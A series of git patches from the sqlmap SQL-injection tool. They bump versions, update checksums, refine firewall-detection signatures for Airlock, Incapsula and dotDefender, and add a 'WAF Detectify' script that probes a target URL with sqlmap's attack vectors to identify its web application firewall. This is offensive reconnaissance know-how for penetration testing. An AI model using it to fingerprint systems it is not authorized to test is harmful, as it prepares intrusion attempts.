debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py From 9e8b28be7c42a7dd65705cfe143a07f70f05f805 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 28 Aug 2018 14:33:48 +0200 Subject: [PATCH 241/428] Minor patch (e.g. case: user's) --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 22ac274019b..f9b28952e54 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.18" +VERSION = "1.2.8.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 7dc46b68e76..9c2ae6dbd03 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -182,7 +182,7 @@ def colorize(self, message, levelno): message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) if level != "PAYLOAD": - for match in re.finditer(r"'([^']+)'", message): # single-quoted + for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted string = match.group(1) if not message.endswith(self.reset): reset = self.reset diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 322cb77972f..86ddca52f04 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -85751568ce17296e01728f4e8041e13b lib/core/settings.py +cdc31078e93dbf8f213c357f5a6ac00a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -285,7 +285,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -c03de596a9090650c83e8ef722b82833 thirdparty/ansistrm/ansistrm.py +1996d6afa985a526df02efa1bf121976 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From c3d9a1c2d47019754a5e377ba78f091009691b1a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 10:56:24 +0200 Subject: [PATCH 242/428] Airlock also uses AL_SESS-S cookie --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/airlock.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f9b28952e54..2a716476039 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.19" +VERSION = "1.2.8.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 86ddca52f04..e90087a2c30 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cdc31078e93dbf8f213c357f5a6ac00a lib/core/settings.py +7784e72dc2d0a290d2512f970dc7dc0f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -390,7 +390,7 @@ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqlud ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py -667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py +a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py dec64f18c23962d279cc1cde6469afed waf/asm.py diff --git a/waf/airlock.py b/waf/airlock.py index 9dc6078ffc0..6f76073d9a8 100644 --- a/waf/airlock.py +++ b/waf/airlock.py @@ -17,7 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: _, headers, _ = get_page(get=vector) - retval = re.search(r"\AAL[_-]?(SESS|LB)=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None + retval = re.search(r"\AAL[_-]?(SESS|LB)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None if retval: break From 0507234add4edf082b81b619149c94eab6114f68 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 11:06:45 +0200 Subject: [PATCH 243/428] Minor update --- lib/controller/checks.py | 5 +++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 074437fce88..4d0bda2e02e 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1359,7 +1359,10 @@ def checkWaf(): value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) + pushValue(kb.redirectChoice) pushValue(conf.timeout) + + kb.redirectChoice = REDIRECTION.YES conf.timeout = IDS_WAF_CHECK_TIMEOUT try: @@ -1368,7 +1371,9 @@ def checkWaf(): retVal = True finally: kb.matchRatio = None + conf.timeout = popValue() + kb.redirectChoice = popValue() if retVal: warnMsg = "heuristics detected that the target " diff --git a/lib/core/settings.py b/lib/core/settings.py index 2a716476039..c5a45ea519b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.20" +VERSION = "1.2.8.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e90087a2c30..7b6c3efaed0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -bc3800ec099df253968b3a7fc1ffce44 lib/controller/checks.py +7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7784e72dc2d0a290d2512f970dc7dc0f lib/core/settings.py +8b9c8ae316a1cdf5809b163d7d451ca5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 8be4b29fd10ea0dc65074eedd1862bbcbd745ad8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 12:13:22 +0200 Subject: [PATCH 244/428] Update of Incapsula WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/incapsula.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c5a45ea519b..f46f88db99c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.21" +VERSION = "1.2.8.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7b6c3efaed0..a1ef50d6f2d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8b9c8ae316a1cdf5809b163d7d451ca5 lib/core/settings.py +cf04fd985a50e6c7fc6b6d61b4b048b6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -415,7 +415,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py eb56ac34775cc3c5f721ec967d04b283 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -2a52c09e4ce1f2a5976ce53b415ef496 waf/incapsula.py +51aed66945f95641cb45c840e7132e3b waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py diff --git a/waf/incapsula.py b/waf/incapsula.py index e08ba65df8f..babf1d59ba6 100644 --- a/waf/incapsula.py +++ b/waf/incapsula.py @@ -19,7 +19,7 @@ def detect(get_page): page, headers, _ = get_page(get=vector) retval = re.search(r"incap_ses|visid_incap", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= re.search(r"Incapsula", headers.get("X-CDN", ""), re.I) is not None - retval |= "Incapsula incident ID" in (page or "") + retval |= any(_ in (page or "") for _ in ("Incapsula incident ID", "_Incapsula_Resource?")) retval |= headers.get("X-Iinfo") is not None if retval: break From 0bbf5f94675a6f96d6f80904c8196065ed95c04b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 12:21:33 +0200 Subject: [PATCH 245/428] Update of dotDefender WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/dotdefender.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f46f88db99c..1af9fd1e032 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.22" +VERSION = "1.2.8.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a1ef50d6f2d..0dbc59dc88c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cf04fd985a50e6c7fc6b6d61b4b048b6 lib/core/settings.py +b52affaeb83ecf36e15e75bd439df284 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -409,7 +409,7 @@ ac96f34c254951d301973617064eb1b5 waf/comodo.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py 0182d23b34cf903537f77f4ec4b144bf waf/distil.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py -357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py +9760a22990f55ab51ea4eedabd939055 waf/dotdefender.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py 954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py diff --git a/waf/dotdefender.py b/waf/dotdefender.py index b7713e21c63..2a49b0def41 100644 --- a/waf/dotdefender.py +++ b/waf/dotdefender.py @@ -15,7 +15,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, _ = get_page(get=vector) retval = headers.get("X-dotDefender-denied", "") == "1" - retval |= "dotDefender Blocked Your Request" in (page or "") + retval |= any(_ in (page or "") for _ in ("dotDefender Blocked Your Request", ' Date: Thu, 30 Aug 2018 14:54:15 +0200 Subject: [PATCH 246/428] Created a WAF Detectify utility --- extra/wafdetectify/__init__.py | 8 +++ extra/wafdetectify/wafdetectify.py | 107 +++++++++++++++++++++++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +- 4 files changed, 119 insertions(+), 2 deletions(-) create mode 100644 extra/wafdetectify/__init__.py create mode 100644 extra/wafdetectify/wafdetectify.py diff --git a/extra/wafdetectify/__init__.py b/extra/wafdetectify/__init__.py new file mode 100644 index 00000000000..7181b22a163 --- /dev/null +++ b/extra/wafdetectify/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py new file mode 100644 index 00000000000..5192e152094 --- /dev/null +++ b/extra/wafdetectify/wafdetectify.py @@ -0,0 +1,107 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import cookielib +import glob +import httplib +import inspect +import os +import re +import subprocess +import sys +import urllib +import urllib2 +import urlparse + +sys.dont_write_bytecode = True + +NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "Miroslav Stampar (@stamparm)" +TIMEOUT = 10 +HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cache-Control": "max-age=0"} +SQLMAP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")) +SCRIPTS_DIR = os.path.join(SQLMAP_DIR, "waf") +CACHE = {} +WAF_FUNCTIONS = [] + +def get_page(get=None, url=None, host=None, data=None): + key = (get, url, host, data) + + if key in CACHE: + return CACHE[key] + + page, headers, code = None, {}, httplib.OK + + url = url or ("%s%s%s" % (sys.argv[1], '?' if '?' not in sys.argv[1] else '&', get) if get else sys.argv[1]) + if not url.startswith("http"): + url = "http://%s" % url + + try: + req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS) + page = urllib2.urlopen(req, timeout=TIMEOUT).read() + except Exception, ex: + code = getattr(ex, "code", None) + page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "") + + result = CACHE[key] = page, headers, code + + return result + +def main(): + global WAF_FUNCTIONS + + print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR) + + if len(sys.argv) < 2: + exit("[x] usage: python %s " % os.path.split(__file__)[-1]) + + cookie_jar = cookielib.CookieJar() + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar)) + urllib2.install_opener(opener) + + sys.path.insert(0, SQLMAP_DIR) + + for found in glob.glob(os.path.join(SCRIPTS_DIR, "*.py")): + dirname, filename = os.path.split(found) + dirname = os.path.abspath(dirname) + + if filename == "__init__.py": + continue + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + if filename[:-3] in sys.modules: + del sys.modules[filename[:-3]] + module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or "utf8")) + except ImportError, msg: + exit("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) + + _ = dict(inspect.getmembers(module)) + if "detect" not in _: + exit("[x] missing function 'detect(get_page)' in WAF script '%s'" % found) + else: + WAF_FUNCTIONS.append((_["detect"], _.get("__product__", filename[:-3]))) + + WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower()) + + print "[i] %d (sqlmap's) WAF scripts loaded" % len(WAF_FUNCTIONS) + + found = False + for function, product in WAF_FUNCTIONS: + if found and "unknown" in product.lower(): + continue + + if function(get_page): + print "[!] WAF/IPS/IDS identified as '%s'" % product + found = True + + if not found: + print "[o] nothing found" + +if __name__ == "__main__": + main() diff --git a/lib/core/settings.py b/lib/core/settings.py index 1af9fd1e032..42c97278d84 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.23" +VERSION = "1.2.8.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0dbc59dc88c..96d13ebbfc8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,6 +21,8 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py +1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py +cf646f49087ff56d752dc831d2245a51 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -48,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b52affaeb83ecf36e15e75bd439df284 lib/core/settings.py +4ecbe8858ce030877cb3e00f437ac87a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From 74d2b60cf3f6854f3a5b407abfdeb3057b789473 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:18:42 +0200 Subject: [PATCH 247/428] Minor colorization of WAF Detectify --- extra/wafdetectify/wafdetectify.py | 29 ++++++++++++++++++++--------- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/generic.py | 2 +- 4 files changed, 25 insertions(+), 14 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 5192e152094..f0ebd8c601a 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -19,11 +19,12 @@ sys.dont_write_bytecode = True -NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "Miroslav Stampar (@stamparm)" +NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "sqlmap developers (@sqlmap)" TIMEOUT = 10 HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cache-Control": "max-age=0"} SQLMAP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")) SCRIPTS_DIR = os.path.join(SQLMAP_DIR, "waf") +LEVEL_COLORS = {"o": "\033[00;94m", "x": "\033[00;91m", "!": "\033[00;93m", "i": "\033[00;92m"} CACHE = {} WAF_FUNCTIONS = [] @@ -41,7 +42,9 @@ def get_page(get=None, url=None, host=None, data=None): try: req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS) - page = urllib2.urlopen(req, timeout=TIMEOUT).read() + conn = urllib2.urlopen(req, timeout=TIMEOUT) + page = conn.read() + headers = conn.info() except Exception, ex: code = getattr(ex, "code", None) page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "") @@ -50,13 +53,21 @@ def get_page(get=None, url=None, host=None, data=None): return result +def colorize(message): + if not subprocess.mswindows: + message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message) + message = message.replace("@sqlmap", "\033[00;96m@sqlmap\033[00;49m") + message = message.replace(NAME, "\033[00;93m%s\033[00;49m" % NAME) + + return message + def main(): global WAF_FUNCTIONS - print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR) + print colorize("%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)) if len(sys.argv) < 2: - exit("[x] usage: python %s " % os.path.split(__file__)[-1]) + exit(colorize("[x] usage: python %s " % os.path.split(__file__)[-1])) cookie_jar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar)) @@ -79,17 +90,17 @@ def main(): del sys.modules[filename[:-3]] module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or "utf8")) except ImportError, msg: - exit("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) + exit(colorize("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], msg))) _ = dict(inspect.getmembers(module)) if "detect" not in _: - exit("[x] missing function 'detect(get_page)' in WAF script '%s'" % found) + exit(colorize("[x] missing function 'detect(get_page)' in WAF script '%s'" % found)) else: WAF_FUNCTIONS.append((_["detect"], _.get("__product__", filename[:-3]))) WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower()) - print "[i] %d (sqlmap's) WAF scripts loaded" % len(WAF_FUNCTIONS) + print colorize("[i] %d WAF scripts loaded" % len(WAF_FUNCTIONS)) found = False for function, product in WAF_FUNCTIONS: @@ -97,11 +108,11 @@ def main(): continue if function(get_page): - print "[!] WAF/IPS/IDS identified as '%s'" % product + print colorize("[!] WAF/IPS/IDS identified as '%s'" % product) found = True if not found: - print "[o] nothing found" + print colorize("[o] nothing found") if __name__ == "__main__": main() diff --git a/lib/core/settings.py b/lib/core/settings.py index 42c97278d84..a016a8a5763 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.24" +VERSION = "1.2.8.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 96d13ebbfc8..8f078653ca4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -cf646f49087ff56d752dc831d2245a51 extra/wafdetectify/wafdetectify.py +85ca5478dc2bd9db40772e52dad2f84a extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4ecbe8858ce030877cb3e00f437ac87a lib/core/settings.py +13758369fddb4d7e791e989966908ee6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -415,7 +415,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py 954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py -eb56ac34775cc3c5f721ec967d04b283 waf/generic.py +ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py 51aed66945f95641cb45c840e7132e3b waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py diff --git a/waf/generic.py b/waf/generic.py index 4db58805828..4be618d8813 100644 --- a/waf/generic.py +++ b/waf/generic.py @@ -26,7 +26,7 @@ def detect(get_page): if code >= 400 or (IDS_WAF_CHECK_PAYLOAD in vector and (code is None or re.search(GENERIC_PROTECTION_REGEX, page or "") and not re.search(GENERIC_PROTECTION_REGEX, original or ""))): if code is not None: - kb.wafSpecificResponse = "HTTP/1.1 %s\n%s\n%s" % (code, "".join(_ for _ in headers.headers or [] if not _.startswith("URI")), page) + kb.wafSpecificResponse = "HTTP/1.1 %s\n%s\n%s" % (code, "".join(_ for _ in (headers.headers if headers else {}) or [] if not _.startswith("URI")), page) retval = True break From 366a3f9336b2a39af405270699f0afa616ce1b98 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 30 Aug 2018 15:21:46 +0200 Subject: [PATCH 248/428] Detect redirect from stdout --- extra/wafdetectify/wafdetectify.py | 4 +++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index f0ebd8c601a..e927756133a 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -54,7 +54,7 @@ def get_page(get=None, url=None, host=None, data=None): return result def colorize(message): - if not subprocess.mswindows: + if not subprocess.mswindows and sys.stdout.isatty(): message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message) message = message.replace("@sqlmap", "\033[00;96m@sqlmap\033[00;49m") message = message.replace(NAME, "\033[00;93m%s\033[00;49m" % NAME) @@ -114,5 +114,7 @@ def main(): if not found: print colorize("[o] nothing found") + print + if __name__ == "__main__": main() diff --git a/lib/core/settings.py b/lib/core/settings.py index a016a8a5763..54e7c282ff8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.25" +VERSION = "1.2.8.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" 